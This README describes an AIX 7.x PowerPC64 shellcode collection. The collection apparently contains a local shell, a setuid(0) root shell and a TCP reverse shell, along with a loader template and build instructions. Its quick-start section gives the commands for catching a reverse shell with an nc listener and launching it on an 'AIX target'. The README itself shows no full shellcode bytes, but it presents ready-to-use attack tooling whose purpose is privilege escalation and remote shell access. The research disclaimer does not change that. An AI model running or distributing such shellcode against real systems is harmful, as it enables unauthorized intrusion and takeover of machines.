___  _______   __  ______                        ____    ___ 
 / _ \|_   _\ \ / / |___  /                       / ___|  /   |
/ /_\ \ | |  \ V /     / /_  __  _ __  _ __   ___/ /___  / /| |
|  _  | | |  /   \    / /\ \/ / | '_ \| '_ \ / __| ___ \/ /_| |
| | | |_| |_/ /^\ \ ./ /  >  <  | |_) | |_) | (__| \_/ |\___  |
\_| |_/\___/\/   \/ \_(_)/_/\_\ | .__/| .__/ \___\_____/    |_/
                                | |   | |                      
                                |_|   |_|                      

      AIX 7.x ppc64 Shellcoding

  [lis r9, hw1       ]   # Bits 48-63
  [ori r9, r9, hw2   ]   # Bits 32-47
  [rldicr r9, r9, 32 ]   # Shift left 32 bits
  [oris r9, r9, hw3  ]   # Bits 16-31
  [ori r9, r9, hw4   ]   # Bits 0-15

----------------------------------------------------------------------------------------------


This research and all associated code, shellcode, and documentation are provided strictly 
for educational and security research purposes.
The material is intended to help security professionals, researchers, and system administrators 
better understand the internals of AIX 7.x on PowerPC64 architecture, improve defensive 
techniques, and advance the field of platform-specific exploit mitigation.

Usage Restrictions :
This content may not be used for unauthorized access, intrusion, or any malicious purposes.  
Any misuse of this research is strictly prohibited and is the sole responsibility of the user.  
The author does not condone or encourage any illegal activity.



AIX PowerPC64 Shellcode Collection
====================================

Tested on:
  - AIX 7.3 TL4 SP0  (7300-04-00-2546)
  - AIX 7.2 TL5 SP10 (7200-05-10-2520)
  - AIX 7.2 TL3 SP6  (7200-03-06-2038) 

Important note 
--------------

AIX 7.x PPC64 shellcode works on other systems with exactly same Technology Level (TL) and Service Pack (SP) 
So a /bin/sh shellcode generated on 7300-04-00-2546 will not work on a system with 7200-05-10-2520 and vice versa. 
Shell code works reliably only on systems matching the same TL/SP, so keep this in mind. 

AVAILABLE SHELLCODE
-------------------

1. Local Shell (104 bytes)
   File: shellcode_local_shell.c
   Spawns /bin/sh locally

2. Setuid Shell (160 bytes)
   File: shellcode_setuid_shell.c
   Calls setuid(0) then spawns shell

3. Reverse Shell (~368 bytes)
   File: shellcode_reverse_shell.c
   TCP reverse shell with command-line IP/port


QUICK START
-----------

Build everything:
  make

Run local shell:
  ./shellcode_local_shell

Run reverse shell:
  nc -lvnp 4444                                  # On listener machine
  ./shellcode_reverse_shell 192.168.1.100 4444   # On AIX target


SHELLCODE_TEMPLATE
------------------

Use the template to build your own shellcode loader:
Edit shellcode_template.c and paste your shellcode bytes into the array.
Compile: 
   gcc -maix64 -Wall -Wextra -O2 -o test shellcode_template.c


COMPILATION
-----------

All programs compile with:
  gcc -maix64 -o <output> <source.c>

Example:
  gcc -maix64 -o my_shell shellcode_local_shell.c


OUTPUT FORMAT
-------------

All shellcode programs generate two formats:

1. Hex dump:
   0000: 7c 08 02 a6 f8 01 00 10 ...

2. C array (ready to use):
   unsigned char shellcode[] =
     "\x7c\x08\x02\xa6"
     "\xf8\x01\x00\x10"
     ...
     ;